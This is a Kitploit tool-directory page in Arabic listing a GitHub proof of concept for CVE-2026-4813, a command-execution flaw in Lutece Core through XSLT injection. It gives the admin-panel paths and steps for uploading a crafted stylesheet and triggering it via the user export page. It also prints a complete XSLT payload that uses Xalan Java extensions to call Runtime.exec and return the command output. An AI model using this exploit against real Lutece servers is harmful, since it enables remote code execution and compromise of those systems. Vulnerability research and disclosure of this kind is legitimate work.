Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-4813 — إثبات مفهوم لاستغلال تنفيذ الأوامر عن بُعد عبر المصادقة من خلال حقن XSLT في Lutece Core، مع توضيح تنفيذ الأوامر عبر أوراق أنماط XSL مصمّمة خصيصًا. | Kitploit
أدوات/GitHubGitHub/trachinus/cve-2026-4813
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubtrachinus/cve-2026-4813

CVE-2026-4813

إثبات مفهوم لاستغلال تنفيذ الأوامر عن بُعد عبر المصادقة من خلال حقن XSLT في Lutece Core، مع توضيح تنفيذ الأوامر عبر أوراق أنماط XSL مصمّمة خصيصًا.

عرض المستودع
منذ يوم واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-4813 (CVSS-B 9.4 حرجة)

تنفيذ أوامر عن بُعد (RCE) عبر حقن XSLT في Lutece Core <= 7.1.7

الشروحات والمزيد على موقعي <

إثبات المفهوم (PoC)

تحتاج إلى حساب بصلاحيات المسؤول.

  1. في لوحة الإدارة، انتقل إلى صفحة إدارة تصدير XSL: /jsp/admin/AdminTechnicalMenu.jsp?tab=xslexportManagement#xslexport

  2. انقر على "إضافة ورقة تحويل جديدة".

  3. ارفع ملف .xsl يحتوي على الحمولة (أمر id بسيط):

root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0" 
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime"
    xmlns:proc="http://xml.apache.org/xalan/java/java.lang.Process"
    xmlns:is="http://xml.apache.org/xalan/java/java.io.InputStreamReader"
    xmlns:br="http://xml.apache.org/xalan/java/java.io.BufferedReader">
    
    <xsl:template match="/">
        <xsl:variable name="process" select="rt:exec(rt:getRuntime(), 'id')"/>
        <xsl:variable name="inputStream" select="proc:getInputStream($process)"/>
        
        <xsl:variable name="reader" select="is:new($inputStream)"/>
        <xsl:variable name="buffereReader" select="br:new($reader)"/>
        <xsl:variable name="resultat" select="br:readLine($buffereReader)"/>
        
        <Output>
            <xsl:value-of select="$resultat"/>
        </Output>
    </xsl:template>
</xsl:stylesheet>
  1. احفظ ورقة XSL الجديدة.

  2. انتقل إلى صفحة تصدير المستخدمين: /jsp/admin/user/ExportUsers.jsp

  3. حدد ورقة التحويل التي أنشأناها للتو ثم قم بالتأكيد.

  4. يجب أن تظهر نتيجة أمر id في الملف المُصدَّر.

تنزيل الأداة